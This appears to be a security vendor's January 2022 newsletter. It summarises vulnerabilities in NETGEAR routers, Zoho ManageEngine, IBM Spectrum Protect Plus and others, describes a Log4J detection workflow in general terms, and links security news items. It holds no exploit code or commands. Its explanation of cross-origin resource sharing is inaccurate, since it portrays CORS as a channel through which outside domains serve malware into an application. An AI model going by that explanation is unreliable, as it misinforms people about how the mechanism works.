The LogicHub Security Roundup: January 2022 Edition
Hello, and welcome to the latest edition of the LogicHub Monthly Update! Each month we’ll be covering a broad view of this past month’s threats, a series of informative use cases seen this month by our teams, and a series of recommended articles, podcasts, and other useful resources.
Batch of NETGEAR Vulnerabilities
WHAT DOES IT DO?
NETGEAR routers are popular routers sold for home use. Along with the Nighthawk R6700 gaming router, there were a series of vulnerabilities found for other versions of NETGEAR router firmware, including mishandling of IEEE 1905 protocols, varying remote code execution vulnerabilities, and command injections affecting the device’s update functionality. These vulnerabilities can be found in the National Vulnerability Database.
Many of these flaws are quite severe and should be carefully reviewed by users of NETGEAR routers. Some potential effects can include full device access, data theft, device manipulation, and possible privilege escalation.
Some of these vulnerabilities have been successfully patched, but many for the R6700 have not. Additionally, some of the hardware-related vulnerabilities (such as with MediaTek microchips), may be much more difficult to patch and instead must be mitigated.
Zoho ManageEngine Authentication Bypass
WHAT DOES IT DO?
Zoho ManageEngine is a popular IT management solution used by enterprises for desktop, mobile device, general patching, and other management purposes. In this vulnerability, Zoho ManageEngine Desktop Central is specifically affected by an authentication bypass vulnerability that was seen in active exploitation this past December.
Attackers taking advantage of this vulnerability could gain unintended and unauthorized access to Desktop Central.
Several patches have been released to address this issue as of December 3rd. Users affected are urged to patch immediately.
IBM Spectrum Protect Plus Cross-Origin Resource Sharing
WHAT DOES IT DO?
IBM Spectrum Protect Plus is a popular option for backup and data replication on all manner of data platforms. Cross-origin resource sharing uses HTTP headers to embed images, scripts, and other elements from other domains. This feature was enabled on Spectrum Protect Plus.
The main problem with cross-origin resource sharing is in its lack of predictability. If the outside domain suddenly serves malware and access control is not properly configured (as in this case), then malware will be served in the requesting application. This can have disastrous effects on users.
An issue was discovered in Reprise RLM 14.2. Because /goform/change_password_process does not verify authentication or authorization, an unauthenticated user can change the password of any existing user. This allows an attacker to change the password of any known user, thereby preventing valid users from accessing the system and granting the attacker full access to that user's account.
The CLI 1.0.0 for Amazon AWS OpenSearch has weak permissions for the configuration file.
An unauthenticated remote attacker can access mySCADA myPRO Versions 8.20.0 and prior without any form of authentication or authorization.
CUSTOMER USE CASE
Log4J Automation and Response
Log4J was a major exercise in patience for every network admin, security engineer, and response team, and we were certainly no different. Though we faced our hardships in producing an effective solution for Log4J, we can comfortably speak on some of the difficulties we witnessed. Besides the typical ‘spray and pray’ attempts on random servers across the web, we also witnessed widespread targeted pentest usage of Log4J crafted strings by attackers. Thankfully, due to our automation below, we were able to keep a close eye on clients and maintain an effective security posture.
The first step in any automated solution is to identify the signatures of the problem (in this case, a lot of LDAP activity and successful traffic out to domains requested in crafted strings), implement careful monitoring (we chose to link into some IP reputation checks, log pulls from different client sources to cross-reference, and case/alert creation upon discovery of successful data transfer), and ensure that the solution is tuned to satisfaction (lots of tuning towards different fuzzing methods was implemented). After assigning scoring based on severity and creating the cases, manual triage was performed. The fact that there were a comfortable number of cases for our MDR to manually triage signaled that our automation was (and continues to be) a massive success.
BENEFITS TO THIS APPROACH
As with any automation that addresses a fast-growing problem, there has to be a careful balance between speed and effectiveness. Even then, the amount of time and energy spent on producing this automation is miniscule compared to the heavy workload that would have awaited manual review of every log collector’s Log4J detections, especially without the ability to cross-reference between sources. Because of the speed of this automation, we were able to alert concerned clients to possible malicious attempts in a timely manner.
This section contains some interesting reading related to the state of infosec today. These articles have a simple summary that explains the basic idea of the news and links to more information.
Kronos hit with ransomware, warns of data breach and 'several week' outage
The Kronos Private Cloud managed to knock out several customers’ services according to the message posted on the Kronos community message board. This caused some waves in the security community, as some companies contracting Kronos would not be able to process their payrolls, namely multiple local governments and enterprises like Tesla.
Australia's first data strategy to create 'one-stop shop' for accessing government data
Coming on the heels of last month’s concerning security advancements by the Australian government is an attempt to modernize all data access methods for citizens. This has sparked a review into the Australian Privacy Act, which may need some modernization as well. One drawback? The goalposts are rather far, with 2025 being the expected delivery time for the proposed modernization plans and 2030 being the extended goal for updated implementation.
Microsoft December 2021 Patch Tuesday: Zero-day exploited to spread Emotet malware
This was one interesting Patch Tuesday for Microsoft. 67 security fixes were released for Office, Powershell, Edge, Print Spooler, and RDC, accented by six zero-day vulnerabilities (though thankfully only one of these was being exploited in the wild). This being Patch Tuesday, all of these vulnerabilities were addressed in some form.
Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips
Various radio communications work together to communicate simultaneously on one chip in modern-day smartphones. This mechanism, known as ‘coexistence’, is the target of the latest attack that can directly pull passwords or observe Bluetooth packets from the Wi-Fi combo chip. Dubbed ‘Spectra’, this idea has been floating around for a while, but is starting to become better formed as a concept. Users are urged to regularly remove unused Wi-Fi networks, Bluetooth pairings, and only use trusted networks if at all possible.
Microsoft informs customers of 'NotLegit' Azure bug
Discovered in October, the Azure bug affects ‘all PHP, Node, Ruby, and Python applications deployed using Local Git on a clean default application in Azure App Service since September 2017’. Apps from September 2017 onward with any Git source after a file was created or modified in the application container were also affected. Only users of Local Git were impacted.
The Y2K22 bug, dubbed such due to its similarity to Y2K, caused a bit of a panic for Microsoft Exchange server admins. The FIP-FS malware scanner integrated into Exchange 2016 and 2019 stores its date in 32 bit format. But when the year 2022 arrived, the 32 bit format caused issues with date and time validations (much like the ones seen in 2000). Now, it’s not just Microsoft, but Honda and SonicWall who are seeing issues. Some car owners are seeing their clocks now set at 2002, and SonicWall users are unable to access the junk inbox and message logs for incoming or outgoing emails.